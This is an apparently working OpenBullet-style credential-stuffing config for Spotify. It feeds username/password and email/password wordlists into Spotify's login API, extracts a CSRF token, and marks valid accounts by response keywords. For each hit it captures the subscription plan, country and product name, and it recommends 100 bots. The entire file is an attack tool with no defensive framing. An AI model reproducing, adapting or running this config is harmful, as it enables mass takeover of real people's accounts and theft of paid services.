[SETTINGS]
{
  "Name": "Spotify",
  "SuggestedBots": 100,
  "LastModified": "2018-04-29T04:53:23.4400939+02:00",
  "AdditionalInfo": "Needs more capture",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1" 
  HEADER "Pragma: no-cache" 
PARSE "<COOKIES(csrf_token)>" LR "" "" Recursive=FALSE -> VAR "CSRF" "" "" 
REQUEST POST "https://accounts.spotify.com/api/login" AutoRedirect=TRUE 
  CONTENT "remember=true&username=<USER>&password=<PASS>&csrf_token=<CSRF>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "__bon: MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "displayName" 
  KEYCHAIN Failure OR 
    KEY "errorInvalidCredentials" 
    KEY "Unexpected status: 400" 
    KEY "{\"error\":\"errorUnknown\"}" 
REQUEST POST "https://www.spotify.com/us/account/overview/" AutoRedirect=TRUE 
  CONTENT "remember=true&username=<USER>&password=<PASS>&csrf_token=<CSRF>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "Spotify Free" 
    KEY "Premium Paused" 
#PARSE_COUNTRY PARSE "<SOURCE>" LR "card-profile-country\">" "<" Recursive=FALSE -> CAP "Country" "" "" 
#PARSE_PRODUCT_NAME PARSE "<SOURCE>" LR "<h3 class=\"product-name\">" "<" Recursive=FALSE -> CAP "Product" "" "" 
